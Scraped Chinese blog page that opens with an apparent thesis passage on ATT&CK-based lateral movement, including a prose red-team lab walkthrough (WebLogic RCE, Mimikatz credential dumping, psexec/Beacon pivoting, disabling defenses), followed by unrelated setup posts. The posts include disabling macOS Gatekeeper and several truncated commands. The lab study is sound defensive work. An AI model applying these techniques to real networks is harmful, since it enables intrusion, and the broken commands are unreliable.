横向渗透技术种类繁多，每种技术都有其特定的应用场景和实现方式。例如，弱密码利用是一种常见且高效的手段，攻击者通过暴力破解或字典攻击等方式尝试登录其他系统。若用户在不同系统中使用相同的密码，则攻击者可轻松扩展控制范围。操作系统漏洞利用则是另一种关键技术，攻击者会寻找未修补的安全漏洞，通过构造恶意代码实现远程执行或权限提升。傀儡账户滥用、网络钓鱼和社会工程等手段也被广泛应用于横向渗透过程中。这些技术往往结合使用，形成复杂的攻击链路。例如，攻击者可能先通过网络钓鱼获取用户凭据，再利用这些凭据进行权限提升，并最终通过远程协议实现横向移动。这种多层次的技术组合使得横向渗透攻击更具隐蔽性和破坏性。

2.2 ATT&CK框架概述

ATT&CK框架由MITRE公司开发，旨在以系统化方式描述网络攻击行为，为企业内网安全防护提供实用指导。其核心在于将攻击行为分为战术与具体技术两个层面：战术代表攻击者的总体策略，技术则详细描述实现这些策略的具体手段。例如，“持久化”战术下可能涉及注册表修改、计划任务创建等技术。这种分层设计让防御者能从宏观到微观全面理解攻击过程，并据此制定防御措施。

ATT&CK框架采用矩阵形式组织战术和技术，直观展示攻击行为模式，覆盖Windows、Linux和macOS等平台，确保适用于不同企业环境。框架还集成了STIX/TAXII标准，支持威胁情报的自动化共享与更新，增强了实用性，成为动态网络安全环境中的关键工具。它可用于威胁建模、检测规则开发、红队演练等多种场景，帮助企业识别潜在风险并验证防御体系的有效性。

在企业内网安全防护中，ATT&CK框架的价值尤为显著。它为安全团队提供标准化语言和参考模型，使其能清晰定义攻击路径并优化资源配置。通过分析框架中的横向移动技术等，企业可发现网络中的薄弱环节，采取措施限制攻击者行动范围。框架的持续更新也确保企业能敏捷应对新型威胁。ATT&CK框架不仅是知识库，更是构建企业主动防御体系的强大工具。

2.3 横向渗透的技术手段

横向渗透的核心策略在于攻击者通过多种技术手段逐步扩大对内网的控制范围。密码攻击是其中最为常见的手段，它利用了用户密码管理不当或系统认证机制薄弱的弱点。暴力破解通过大量尝试密码组合，尤其在密码复杂度低或用户常用简单密码的情况下效果显著。而哈希传递攻击则更为高级，它利用窃取到的用户哈希值进行身份验证，绕过了传统密码保护，对企业内网构成重大威胁。凭证窃取也是关键一环，利用工具如Mimikatz从内存中提取登录凭据，从而访问其他主机和服务。

漏洞利用在横向渗透中同样占据重要地位。系统漏洞利用针对操作系统或应用程序的安全缺陷，借助工具如Metasploit可快速实施攻击。Web漏洞利用在企业内网中尤为常见，利用SQL注入、命令执行等漏洞获取敏感信息或控制服务器。服务漏洞利用也不容忽视，配置不当或版本过旧的内网服务成为攻击者横向移动的重要途径。通过扫描和测试工具，攻击者能迅速定位并利用这些漏洞。

ARP欺骗和RDP攻击也是横向渗透中的重要技术。ARP欺骗通过伪造数据包，将流量导向攻击者机器，实现中间人攻击或信息窃取。RDP攻击则利用远程桌面协议的弱点，尤其是弱口令或未授权访问问题，让攻击者远程操控目标主机。这些技术往往结合使用，形成多阶段攻击模式。攻击者可能先通过漏洞利用获得初始立足点，再利用凭证窃取技术扩大控制范围，最后部署后门程序确保长期访问。这种复杂的攻击模式增加了防御难度，强调了全面防护策略的重要性。

第三章基于ATT&CK的红队实战靶场的实现

3.1攻防演练环境拓扑结构解析

为了全面模拟真实企业网络环境下的红队攻击路径与防御响应机制，本次红队实战靶场采用典型的“DMZ区 + 企业内网”双网段架构，结合多主机、多角色的部署方式，构建了一个集信息收集、漏洞利用、横向移动、权限提升与持久控制于一体的高仿真攻防环境。

本靶场网络结构如下：

内网网段（10.10.10.0/24）：代表企业核心网络，部署关键资产主机，包括一台域控制器（DC）、一台应用服务器（Web/MSSQL）、一台普通终端（PC）。攻击者的目标是通过渗透DMZ区逐步向内网横向扩展，最终实现对域环境的完全控制。

DMZ网段（192.168.111.0/24）：模拟企业对外服务区域，用于部署攻击入口与测试平台。攻击者初始落点位于该区域，通过网页代理、特殊协议代理（如DNS、ICMP）等方式逐步渗透至内网。

主机信息：

主机角色	IP 地址	操作系统	主要应用/用途
域控（DC）	10.10.10.10	Windows Server 2012	AD域服务
Web服务器	10.10.10.80 / 192.168.111.80	Windows Server 2008	Weblogic 10.3.6、MSSQL 2008
客户端PC	10.10.10.201 / 192.168.111.201	Windows 7 (32-bit)	企业终端模拟
攻击机	192.168.111.1	Kali Linux	起始攻击平台

网络隔离策略：

防火墙策略模拟真实企业隔离规则，对测试机进行出站限制，仅允许其访问192网段资源，以模拟从公网发起攻击、绕过边界防护设备进行初始渗透的场景。该策略为后续代理链搭建与边界突破实验提供良好基础。

技术要点覆盖：

本靶场支持并鼓励以下关键攻击技术的实操训练：

凭证获取与利用：NTLM抓取与中继、Access Token操作、Pass-the-Ticket（PTT）、Pass-the-Hash（PTH）等。

漏洞利用与横向渗透：MS14-068、GPP、SMB/EWS Relay、SPN扫描与服务劫持。

后门与持久控制：黄金票据、白银票据、SID History注入、WMI与MOF后门等。

信息收集与代理穿透：域内信息收集、WMI查询、二层/三层代理、DNS/ICMP协议隧道等。

3.2 信息收集与漏洞利用

红队攻击的第一阶段通常从信息收集开始，攻击者通过扫描技术识别目标系统的可达性、服务开放情况及潜在漏洞。这一阶段至关重要，它决定了攻击链的起点和整体攻击路径的构建方式。信息收集不仅限于主机和端口的识别，还包括对目录结构、中间件类型、服务版本的掌握，为后续的漏洞利用与权限提升奠定基础。

在企业内网环境中，尤其是部署了较为复杂结构（如DMZ区、双网卡分区等）的场景下，攻击者常借助自动化工具实现初步的网络扫描与渗透路径识别。随着中间件安全问题频发，WebLogic、Tomcat、Jenkins 等成为攻击常用入口，相关CVE漏洞也频繁出现在实战渗透中。

3.3 主机存活探测与端口扫描

在渗透初期，通过对 192.168.236.0/24 网段进行主机存活探测，发现目标主机 192.168.236.80 处于在线状态，并开放了多个服务端口。随后使用 nmap 工具对该主机进行端口扫描与服务识别，确认其启用了 HTTP 等常见服务，并开放了 7001 端口。

通过 dirsearch 工具对该主机的 7001 端口进行目录扫描，发现典型 WebLogic 管理页面路径。随后使用 WebLogicScanner 工具对该服务进行识别与验证，确认目标主机部署了 WebLogic 中间件。这为后续的服务分析与攻击链构建提供了基础信息

值得注意的是，在对目标中间件服务进行识别与分析的过程中，扫描结果显示其存在多个已知的高危反序列化漏洞，主要集中于 WebLogic 历史版本中常见的 XMLDecoder 接口与 T3 协议处理模块。这些漏洞通常可被远程触发，具备较高的利用价值，典型示例如下：

CVE-2019-2725：异步组件存在 XMLDecoder 反序列化漏洞，在默认配置下即可被远程利用，攻击者无需认证即可执行任意代码。

CVE-2017-10271：Web Services 组件存在反序列化漏洞，SOAP 请求可触发执行，部分环境中可绕过补丁。

CVE-2017-3506：早期版本中 XMLDecoder 接口未进行有效输入校验，可通过构造恶意 XML 数据实现命令执行。

CVE-2016-0638：T3 协议处理存在反序列化缺陷，允许攻击者通过特定请求触发远程代码执行。

3.4 Weblogic 中间件漏洞利用

在确认目标主机部署了存在历史漏洞的 WebLogic 中间件后，利用其存在的 Java 反序列化漏洞（CVE-2019-2725）构造恶意请求，实现远程命令执行

通过远程执行命令，攻击者进一步将木马工具上传至目标主机，并在其上建立初始控制通道，为后续的权限维持、内网横向渗透与凭证获取等操作打下基础。

3.5 权限提升

在成功获得目标主机的初始访问权限后，上传常用的提权工具，对系统进行环境探测与漏洞利用，最终实现本地权限提升，获取管理员权限。

为保障后续操作的稳定性，并绕过可能存在的安全防护机制，在获取高权限后关闭本地防火墙及相关安全软件，为进一步渗透与横向移动提供便利条件。

3.6 内网信息收集与横向渗透

在成功控制 WebLogic 主机后，开始对内网进行信息收集与拓扑探测，尝试发现更多潜在的攻击路径。通过执行基础命令，收集当前网络环境信息，包括主机名、域信息、当前登录用户、在线进程及计划任务等，为后续横向移动和权限维持做好准备。

使用 whoami /all 获取当前用户的详细权限信息，并通过 net group 命令识别当前域为 de1ay.com。随后，枚举域内主机与域控信息，确认当前域中包含两台主机：WEB（已控制）与 PC，以及一台域控制器 DC，域控 IP 地址为 10.10.10.10，PC 主机地址为 10.10.10.201。

接着，利用 mimikatz 进行凭据抓取，成功从 WEB 主机中导出多个账户的 Hash 值及明文口令，其中包括管理员密码 1qaz@WSX。利用该凭据进行密码重用尝试，成功登录并控制多台内网主机。

为实现横向移动，通过上传 fscan 工具对域成员主机进行端口扫描，发现目标主机开启了 445 端口，并存在 “永恒之蓝” 漏洞。在具备管理员权限和服务访问条件的前提下，使用 psexec 工具结合 SMB 通信发起横向渗透操作。同时配置 Beacon SMB 监听器，通过命名管道进行会话派生和管理，在 Jump 模块中选择对应目标并通过 psexec64 成功获取远程 Shell。

第四章企业环境中的安全防御与维护

4.1 加强资产管理与网络隔离

企业首先应构建全面的资产识别机制，借助ARP扫描、协议轮询、代理上报、接口集成等手段，实现对物理主机、虚拟资源、云平台和容器环境的统一发现与登记。为适应资产动态变化，应部署自动化资产管理系统，实现生命周期管理、状态监控与数据同步，确保台账信息完整、实时、可追溯。

网络隔离应遵循纵深防御原则，分为边界区、核心业务区、办公接入区与管理运维区四个层次。边界区开放最小必要端口；核心区与边界之间设置单向通信策略；办公区结合身份认证与VLAN策略控制访问权限；运维区通过堡垒机集中接入，并记录完整操作日志。在云环境中，应通过虚拟网络与安全组策略实现微隔离控制，防止跨服务横向移动。

权限控制应基于最小权限原则，从网络、主机、应用与数据四个层面构建完整的权限体系。结合访问控制列表、主机强制策略、应用角色建模与数据脱敏机制，可实现分层控制。同时，企业应引入零信任架构，对用户身份与设备状态进行动态验证，确保每次访问都经过风险评估与策略判断。

服务管理方面，应对企业各类系统开展基线审计，停用所有无业务必要性的服务与端口。对于确需开放的服务，应启用协议加固与认证机制，防止被扫描与利用。在容器环境中，应配置严格的网络策略，禁止未授权Pod之间的通信行为，进一步缩小攻击面。

4.2 强化漏洞管理与补丁更新

漏洞管理应基于资产重要性、漏洞严重性和攻击路径的三维模型进行综合评估。高价值资产应每日扫描外部暴露面，内部资产则进行周期性凭证扫描。评估结果应统一汇总至可视化平台，生成风险热力图，便于管理层识别重点问题与制定策略。

补丁管理需建立分级响应机制。对紧急漏洞应快速启动修复流程，涵盖测试验证、灰度发布、监控回溯与正式部署全过程。对于高风险漏洞，可设立月度修复窗口，借助自动化工具批量完成补丁推送和状态标记。针对不支持更新的遗留系统，应部署虚拟补丁、系统保护机制与访问限制措施。

企业应构建以威胁情报驱动的漏洞监控体系，接入多个情报源，通过漏洞编号与资产匹配，识别潜在高危点。对可导致横向移动或数据泄露的漏洞，应优先安排资源修复。启发式检测与内存防护机制的引入，可增强对未知威胁的响应能力。

第三方组件安全需贯穿软件全生命周期管理。开发阶段使用组件分析工具识别开源库的许可证与漏洞风险，交付阶段开展代码审计，运行阶段部署运行时探针防范注入攻击。对高风险组件，应制定替代与版本迁移计划，控制供应链风险。

4.3 部署多层次安全防护机制

企业应在网络边界部署基于规则的入侵防御系统，用于实时识别和拦截常见攻击行为；内部网络应结合行为分析技术，检测异常通信与潜在威胁。云主机与虚拟工作负载则应部署主机型安全代理，实现系统文件与进程的全面监控。

安全信息与事件管理系统（SIEM）应具备日志格式标准化、事件聚合分析与攻击路径识别能力。通过解析器将不同来源日志统一结构后进行分析，并结合攻击链模型自动识别阶段性攻击行为。配合自动化响应机制，系统可快速联动防护设备实施阻断。

用户与实体行为分析（UEBA）系统应基于用户历史行为构建动态模型，识别越权访问、数据泄露等异常行为。服务器实体可通过资源占用变化检测隐藏进程、挖矿软件等非法活动。行为偏差触发后，应联动DLP系统或其他控制措施，阻断数据外传行为。

安全审计与合规检查需实现持续化、自动化。主机日志应集中采集存储至不可篡改平台，关键操作过程应启用录像审计。企业应每季度开展合规性核查，如等级保护要求评估，并通过整改跟踪机制实现安全状态的闭环管理。

4.4 建立应急响应与恢复机制

企业应制定完整的事件响应计划，覆盖事件发现、初步分类、隔离封锁、证据保留、根因分析与恢复优化六个环节。响应过程中应配合标准化流程手册，确保各类人员在突发事件中可迅速执行对应处置动作。

实战攻防演练是检验安全防御体系有效性的关键手段。企业应定期开展红蓝对抗，模拟攻击链与响应链全过程。演练结束后组织评估会议，从检测能力、响应速度、溯源效果等方面识别改进空间。

数据备份体系应采用“3-2-1”原则，至少三份副本、两类存储介质、一份离线备份。结构化数据建议使用持续保护机制，非结构化数据采用版本化存储方式。定期开展恢复演练，验证数据可用性与灾备能力，确保业务连续性。

每起重大安全事件结束后，应输出包括技术报告、管理报告、整改清单与培训材料在内的四类成果物。同时，建议建设事件知识图谱，系统归纳攻击行为与防御措施之间的关联，为后续防御能力提升与攻击模型优化提供数据支持。

总结

本研究围绕企业内网横向渗透攻击的防御与验证展开，深入剖析了该类攻击的威胁本质与防御难点。在信息技术快速发展的背景下，企业面临的网络攻击从边界突破转向内部横向渗透，攻击者借助弱密码、漏洞利用、凭证窃取等手段在内网中扩展控制权限，对企业核心资产造成严重威胁。传统防御如边界控制、访问管理、数据加密在应对内网攻击方面存在响应迟缓、误报率高等问题。

为应对上述挑战，研究以MITRE ATT&CK框架为理论基础，设计红队靶场进行实战验证。ATT&CK框架通过战术与技术的双层结构，系统地描述攻击者行为，为靶场演练提供了科学参考。通过复现实战流程，研究构建了完整攻击链条：从信息收集、主机与端口扫描、目录与中间件探测，到漏洞利用、权限提升，直至横向移动并控制多个主机。演练中使用工具如dirsearch、WeblogicScanner、Mimikatz等，成功实现对Weblogic服务器的远程命令执行与权限获取，进一步利用SMB监听器和Hash转发技术完成横向移动与权限接管。

研究成果不仅验证了多种横向渗透技术的可行性，也揭示出当前企业内网在权限管理、补丁修复、访问控制等方面存在明显短板。基于实验结果，研究提出优化建议，如加强凭据管理、部署微分段技术、引入高级威胁检测系统（如行为分析与AI监控）、构建自动化响应机制等，提升内网可视化与纵深防御能力。

此外，靶场的设计原则（仿真性、可扩展性、安全性）及使用虚拟化与自动化技术实现多层网络构建，为后续安全研究和培训提供了可复用模板。研究还强调学术与产业合作的重要性，通过模拟真实攻击环境推动技术实践与理论模型的融合，为网络安全领域特别是内网渗透防御研究奠定了坚实基础，也为企业防护策略提供了数据支持与实践依据。

chatlog

casearx@foxmail.com (Casear) — Fri, 09 May 2025 12:06:22 GMT

Chatlog 使用介绍与安装指南（聊天记录工具，帮助大家轻松使用自己的聊天数据）

sjzar/chatlog

从本地数据库文件获取聊天数据
支持 Windows / macOS 系统
支持微信 3.x / 4.0 版本
提供 Terminal UI 界面 & 命令行工具
提供 HTTP API 服务，支持查询聊天记录、联系人、群聊、最近会话等信息
支持 MCP SSE 协议，可与支持 MCP 的 AI 助手无缝集成
支持多媒体消息，支持解密图片、语音
支持自动解密数据，简化使用流程
支持多账号管理，可在不同账号间切换

🌟 项目特点

✅ 终端图形界面：基于 tview 与 tcell，实时显示聊天记录。
🔊 语音消息支持：支持 Silk、MP3 编解码播放（使用 go-silk 和 go-lame）。
📁 多数据源读取：支持读取本地文件、数据库、API 等。
🛠️ 丰富的配置项：基于 viper 提供灵活的配置方式。
📡 可扩展接口：集成 Gin Web 框架，支持 RESTful API。

🧩 依赖组件（部分）

组件	功能
`tview` / `tcell`	终端界面框架
`go-silk` / `go-lame`	音频编解码
`gopsutil`	系统资源监控
`viper`	配置文件管理
`go-sqlite3`	聊天记录存储
`gin`	HTTP 接口服务

🚀 安装方法

方法一：使用 `go install`（推荐）

如果你的系统已安装 Go 环境（Go 1.18+）：

echo 'export PATH="$HOME/go/bin:$PATH"' >> ~/.zshrc
source ~/.zshrc

方法二：下载预编译版本

访问项目的 Releases 页面下载适合系统的预编译版本。

👨‍💻 使用方法

推荐使用 Cherry Studio（因为我电脑里只有这个）

官网：https://cherry-ai.com/

使用方式：MCP SSE

在设置 - MCP 服务器下点击添加服务器，输入名称为 chatlog，选择类型为服务器发送事件(sse)，填写 URL 为 http://127.0.0.1:5030/sse 点击保存。（注意：点击保存前不要先点击左侧的开启按钮）

选择支持 MCP 调用的模型，打开 chatlog 工具选项

测试功能是否正常

在模型能调用mcp服务后即为正常

在作者的 GitHub仓库中有更为详细的文档

https://github.com/sjzar/chatlog/tree/main/docs

mac 安装第三方应用问题

casearx@foxmail.com (Casear) — Sun, 27 Apr 2025 13:53:54 GMT

sudo xattr -r -d com.apple.quarantine 是一个在 macOS 终端中使用的命令，用于递归移除文件和目录的隔离属性（quarantine）

命令解释：

sudo：以管理员权限运行
xattr：macOS 用于管理文件扩展属性的命令。
-r：递归处理，即对目标目录及其所有子目录和文件生效。
-d com.apple.quarantine：删除指定的扩展属性（这里是 com.apple.quarantine）。

作用：
macOS 会对从网络下载的文件（如浏览器、邮件、微信等来源）自动添加 com.apple.quarantine 标记。当你首次打开这类文件时，系统会触发 Gatekeeper 安全检查，可能会弹出警告，比如：

“无法打开，因为来自身份不明的开发者”

“文件已损坏”

“您确定要打开吗？”

运行此命令后，系统不再检查该文件的来源，可直接运行（适用于已确认安全的文件或应用）。

使用方法：
打开终端（应用程序 → 实用工具 → Terminal）。

输入命令

sudo xattr -r -d com.apple.quarantine /Applications/SomeApp.app

将 /Applications/SomeApp.app 替换为你的文件或目录路径（如拖拽文件到终端可自动填充路径）。

按回车，输入管理员密码（输入时不会显示字符），再次回车确认。

常见用途：
解决“应用已损坏”错误：某些破解版或第三方应用被 macOS 拦截时使用。

跳过烦人的Gatekeeper提示：直接运行下载的脚本或工具。

批量处理目录：例如解除整个 ~/Downloads 目录的隔离：

bash
sudo xattr -r -d com.apple.quarantine ~/Downloads
注意事项：
仅对信任的文件执行此操作！移除隔离属性后，系统不再检查文件安全性。

最后还有一个命令，但是我相信每个使用mac的开发者都会把他打开的

sudo spctl  --master-disable

一言

casearx@foxmail.com (Casear) — Fri, 01 Aug 2025 08:44:40 GMT

别离是氤氲一生的长河

大部分人都只是我生命的玻璃窗上缓缓划过的雨水

但也有那么一小部分人

如果把他们比喻成我生命的玻璃窗上缓缓划过的雨水

我情愿一辈子生活在雨季

zsh 安装与配置，使用 oh-my-zsh 美化终端

casearx@foxmail.com (Casear) — Mon, 31 Mar 2025 05:29:32 GMT

# 更新软件源
sudo apt update
# 安装 zsh git curl
sudo apt install zsh git curl -y
#设置终端为zsh(不需要sudo)
chsh -s /bin/zsh

安装 oh-my-zsh

官网：http://ohmyz.sh/。

"$(curl -fsSL https://install.ohmyz.sh/)"

2.2.1 powerlevel10k

根据 What’s the best theme for Oh My Zsh? 中的排名，以及自定义化、美观程度，建议使用 powerlevel10k 主题。

clone --depth=1 https://github.com/romkatv/powerlevel10k.git ${ZSH_CUSTOM:-$HOME/.oh-my-zsh/custom}/themes/powerlevel10k

在 ~/.zshrc 设置 ZSH_THEME="powerlevel10k/powerlevel10k"。接下来，终端会自动引导你配置 powerlevel10k。

:::tip{title="提示"}
很奇怪，同样的插件同样的主题和框架，win上就会很卡，mac上就很正常，是因为mac是Darwin/XNU的原因吗
:::

pve虚拟机硬盘直通

casearx@foxmail.com (Casear) — Mon, 10 Feb 2025 13:58:41 GMT

shell连接到pve

ls -l /dev/disk/by-id/

使用命令列出/dev/disk/by-id/ 目录下的磁盘设备及其符号链接，并显示详细信息

`ls -l /dev/disk/by-id/` 输出解析

这段输出是 ls -l /dev/disk/by-id/ 命令的结果，显示了系统中所有磁盘设备的唯一标识符及其对应的实际设备路径。以下是对输出的详细解析：

1. 物理磁盘设备

SATA 磁盘

ata-WDC_WD30EFRX-68EUZN0_WD-WC3K20137CO6 -> ../../sda
- 这是一块西部数据（WD）的 SATA 硬盘，型号为 WD30EFRX-68EUZN0，序列号为 WD-WC3K20137CO6。
- 它对应的设备是 /dev/sda。
ata-WDC_WD30EFRX-68EUZN0_WD-WC3K20137CO6-part1 -> ../../sda1
- 这是该硬盘的第一个分区，对应的设备是 /dev/sda1。

NVMe 磁盘

nvme-eui.00000000000000008ce38e030067cc30 -> ../../nvme0n1
- 这是一块 NVMe 固态硬盘，其 EUI（扩展唯一标识符）为 00000000000000008ce38e030067cc30。
- 它对应的设备是 /dev/nvme0n1。

2. LVM 逻辑卷

LVM 逻辑卷

dm-name-pve-root -> ../../dm-1
- 这是 LVM 逻辑卷，名称为 pve-root，对应的设备是 /dev/dm-1。
- 通常用于 Proxmox VE 的根文件系统。

LVM UUID

dm-uuid-LVM-*
- 这些是 LVM 逻辑卷的唯一标识符（UUID），指向对应的设备（如 /dev/dm-*）。
- 例如：
  - dm-uuid-LVM-XVuuRByC5bzwVfi0uXGj3l8l05YD36wqghMtCUCH8Ve8ZjtFmv5TmgIbFgOANy7c -> ../../dm-0
  - 这是 LVM 逻辑卷的 UUID，对应的设备是 /dev/dm-0。

解析

这个回显显示了系统中所有磁盘设备的唯一标识符及其对应的实际设备路径。

set '虚拟机ID' -sata2 /dev/disk/by-id/'硬盘信息'

所以我该使用的命令是

set 101 -sata2 /dev/disk/by-id/ata-WDC_WD30EFRX-68EUZN0_WD-WC
3K20137CO6

最后附上自己写的一个小脚本

https://github.com/CasearF/device-passthrough-tool

tldr-pages 安装

casearx@foxmail.com (Casear) — Fri, 07 Feb 2025 13:27:08 GMT

也许您是命令行世界的新手。也许您只是有点生疏，或者总是记不住诸如lsof、或tar?等命令的参数。

tldr-pages项目是社区维护的命令行工具帮助页面的集合，旨在成为传统手册页的更简单、更平易近人的补充。

安装
```
sudo apt-get install tldr
```
修改语言
更新数据库
```
sudo tldr --update
```
如果返回

tldr: /root/.local/share/tldr: createDirectory: does not exist (No such file or directory)

则说明它找不到tldr文件，我们需要手动创建一个：
```
sudo mkdir -p /root/.local/share/tldr
```

更新的回显可以看到zh的只更新了917条数据，但是en的却更新了5441条，这就会导致有部分文档还是英文的

Arch-linux安装桌面环境

casearx@foxmail.com (Casear) — Fri, 03 Jan 2025 08:47:17 GMT

pve安装Arch-linux

casearx@foxmail.com (Casear) — Fri, 03 Jan 2025 09:43:44 GMT

准备工作

下载镜像

https://archlinux.org/download/ 从Arch官网下载需要的镜像

或者从镜像源下载

pve创建虚拟机

正常选择配置

:::warning{title="注意"}
磁盘格式需为原始磁盘镜像raw
:::

虚拟机内配置

启动虚拟机

正常启动虚拟机
选择第一行的安装

安装配置

使用ip a查看ip地址

使用passwd设置一个临时密码

:::note{title="注"}
该密码仅为当前安装的控制密码，在重启后再次安装时又是一个全新的引导，有需要的话还需要重新设置
:::

设置完密码后使用shell工具来连接刚刚的ip地址

分区格式化挂载

输入lsblk查看磁盘分区情况，可以看到存在一个名称为sda磁盘(就是你在pve中给虚拟机分配的磁盘大小)

分区操作简述

启动 fdisk 工具
使用命令 fdisk /dev/sda 对硬盘 /dev/sda 进行分区操作。
创建新分区表
硬盘没有有效的分区表，fdisk 创建了一个新的 DOS（MBR）格式的分区表。
创建新分区
输入 n 创建新的分区，选择了默认的“主分区”（primary）。
选择分区编号
输入默认的分区编号“1”。
分区起始与结束
选择默认的起始扇区和结束扇区，分区大小为 64GB。
完成操作
新分区创建完成，类型为 Linux，大小 64GB。

在启动 fdisk 工具后，输入 n 来创建新的分区，遇到提示时直接按回车使用默认选项，直到操作完成并再次弹出提示时输入w来保存分区

保存后再使用lsblk命令查看，发现磁盘sda1创建成功

此时再使用mkfs.ext4 /dev/sda1命令对新建的磁盘进行格式化

最后再使用mount /dev/sda1 /mnt来将分区挂载

使用lsblk查看，发现挂载成功

换源

简明vim练级攻略

输入 vim /etc/pacman.d/mirrorlist 来打开配置文件，在前方粘贴镜像源地址

# 生成 fstab 文件，-U 表示设置 UUID

切换root权限:

# arch-chroot Bash脚本是软件包arch-install-scripts的一部分

设置时区：

ln -sf /usr/share/zoneinfo/Asia/Shanghai /etc/localtime  # 设置时区为上海
hwclock  # 查看硬件时钟

设置主机名和root密码:

# 安装vim编辑器
echo arch > /etc/hostname  #  设置主机名为arch
passwd  # 设置root用户的密码

这里设置的就是正常使用的时候的密码了

安装引导程序:

# 安装GRUB
grub-install --recheck /dev/sda      # 安装GRUB到硬盘
grub-mkconfig -o /boot/grub/grub.cfg  # 生成配置文件

网络服务：

# 安装网络管理器

写入主机名解析配置

cat >> /etc/hosts << EOF
127.0.0.1 localhost
::1 localhost
127.0.1.1 arch.lan arch
EOF

ssh服务

echo PermitRootLogin yes >> /etc/ssh/sshd_config  # 允许root用户登录

配置语言环境

使用 vim /etc/locale.gen打开 /etc/locale.gen，取消以下两行的注释

# 生成locale信息
echo LANG=en_US.UTF-8 > /etc/locale.conf  # 创建locale.conf文件，提交所要使用的本地化选项。目前先使用英文语言环境，等安装了图形用户界面再切换到中文环境

卸载分区，重启系统

exit  # 退出 chroot 环境
umount -R /mnt  # 卸载所有挂载点
reboot  # 重启系统

安装成功

重启进入系统后，使用root用户登录进系统：

执行以下命令恢复网络以及开启ssh服务：

enable sshd --now
systemctl enable NetworkManager --now

提问的艺术极简板

casearx@foxmail.com (Casear) — Fri, 27 Dec 2024 08:51:08 GMT

Waline 服务端独立部署解决方案

casearx@foxmail.com (Casear) — Thu, 29 Aug 2024 22:20:15 GMT

Waline 是一个基于 LeanCloud 的评论系统，它是 Valine 的一个分支，提供了一些改进和新功能。Waline 旨在为博客、网站和其他在线平台提供简洁、安全的评论服务。

准备工作

Waline官网独立部署文档，官网采用docker独立部署，更为方便快捷。本文讲述在服务器或者自己电脑上用node包的样式来运行（虽然不知道为什么要在自己电脑上运行，但我5点爬起来就这么干了）

Waline的数据库文件 waline.sql

环境变量配置参考表

环境变量名称	必填	默认值	备注
MYSQL*HOST		127.0.0.1	MySQL 服务的地址
MYSQL_PORT		3306	MySQL 服务的端口
MYSQL_DB	√		MySQL 数据库库名
MYSQL_USER	√		MySQL 数据库的用户名
MYSQL_PASSWORD	√		MySQL 数据库的密码
MYSQL_PREFIX		wl*	MySQL 数据表的表前缀
MYSQL_CHARSET		utf8mb4	MySQL 数据表的字符集
MYSQL_SSL			是否使用 SSL MYSQL 连接数据库

方法1

在linux操作系统下，可以直接修改主目录下的.bashrc文件
写入

export MYSQL_HOST=12.12.12.12
export MYSQL_PORT=3306
export MYSQL_DB=waline

填写完成后保存文件并执行以下命令刷新：

source ~/.bashrc

该方法是直接导出系统级的环境变量，使waline 服务端可以从process.env对象中顺利读取到，而这样定义的全局环境变量存在一个弊端，就是会污染到全局，可能会干预到其他项目，而且 windows 与 linux 的配置方法各不相同。所以这里并不推荐，而是更推荐使用方案二

方法2

在使用Node.js进行项目开发时，可以通过process.env对象访问环境变量。而dotenv是一个流行的Node.js库，它允许你将环境变量配置在一个.env文件中，这个文件通常位于项目的根目录下。使用dotenv的好处是不会污染全局环境变量，并且可以使配置和代码分离，便于管理和维护。

安装dotenv：首先，需要在你的Node.js项目中安装dotenv库。

# .env 文件示例
MYSQL_HOST=127.0.0.1
MYSQL_PORT=3306
MYSQL_DB=waline
MYSQL_USER=root
MYSQL_PASSWORD=yourpassword

创建入口文件：在入口文件main.js顶部引入并配置dotenv。

const dotenv = require('dotenv')
 // 调用config方法合并.env环境变量
 dotenv.config()
 // 引入并执行该文件
 require('@waline/vercel/vanilla.js')   ```

使用dotenv的好处是，它只在当前项目中有效，不会影响到其他项目或全局环境。此外，.env文件通常不会被加入到版本控制系统（如git），这样可以避免敏感信息（如数据库密码）泄露。

至此，项目构建完成，可以在本地启动进行测试

记-先锋书店

casearx@foxmail.com (Casear) — Sat, 20 Jul 2024 15:35:22 GMT

api开发-更优雅的[规范响应数据]

casearx@foxmail.com (Casear) — Thu, 04 Jul 2024 12:19:50 GMT

api开发-更优雅的[规范响应数据]

统一响应函数

function sendResponse(res, status, message, data = {}, error = {}) {
    res.json({
        status: status === 200 ? 'success' : 'error',
        code: status,
        message: message,
        data: data,
        error: error
    });
}

{
    "status": "success",
    // 描述 HTTP 响应结果：HTTP 状态响应码在 500-599 之间为”fail”，在 400-499 之间为”error”，其它均为”success”
    "code": 200,
    // 包含一个整数类型的 HTTP 响应状态码，也可以是业务描述操作码，比如 200001 表示注册成功
    "message": "操作成功",
    // 多语言的响应描述
    "data": {
    // 实际的响应数据
        "nickname": "Joaquin Ondricka",
        "email": "lowe.chaim@example.org"
    },
    "error": {}
    // 异常时的调试信息
}

统一的数据响应格式，固定包含：code、status、data、message、error
内置 Http 标准状态码支持，同时支持扩展 ResponseCodeEnum 来根据不同业务模块定义响应码
响应码 code 对应描述信息 message 支持本地化，支持配置多语言
合理地返回 Http 状态码
根据 debug 开关，合理返回异常信息、验证异常信息等

调用方法

// 处理GET请求，获取用户信息
app.get('/api/sql/', async (req, res) => {
    const userId = req.query.id;
    try {
        const userInfo = await userModule.getUserInfo(userId);
        sendResponse(res, 200, "操作成功", userInfo);
    } catch (error) {
        console.error('Error fetching user info:', error);
        sendResponse(res, 500, "服务器错误", {}, { message: error.message });
    }
});

getUserInfo函数是一个SQL查询的函数，返回一个数组
将响应码描述数据都通过通用操作函数来处理，达到规范化的效果

sqli 1-7关

casearx@foxmail.com (Casear) — Mon, 01 Jul 2024 13:55:48 GMT

Nginx Proxy Manager安装及避坑指南

casearx@foxmail.com (Casear) — Tue, 25 Jun 2024 14:44:59 GMT

Nginx Proxy Manager 安装与使用指南

前言

这篇文章介绍了如何安装 Nginx Proxy Manager，一款基于 Nginx 的反向代理管理工具，以及在使用过程中可能遇到的问题和解决方法。文章提供了安装和配置 Nginx Proxy Manager 的简要步骤，并详细介绍了如何避免常见问题，例如无法反代某些网站、SSL 证书配置错误等。通过本文提供的避坑指南，你可以更轻松地使用 Nginx Proxy Manager，享受更好的反向代理体验。

使用`Docker`安装

拉取镜像

sudo sh get-docker.sh
sudo systemctl enable docker
sudo systemctl start docker
sudo usermod -aG docker $USER

接下来，安装 Docker Compose：

sudo curl -L "https://github.com/docker/compose/releases/download/1.29.2/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose
sudo chmod +x /usr/local/bin/docker-compose

配置 Nginx Proxy Manager

创建一个新目录来存放 Nginx Proxy Manager 的配置文件和数据：

mkdir nginx-proxy-manager
cd nginx-proxy-manager

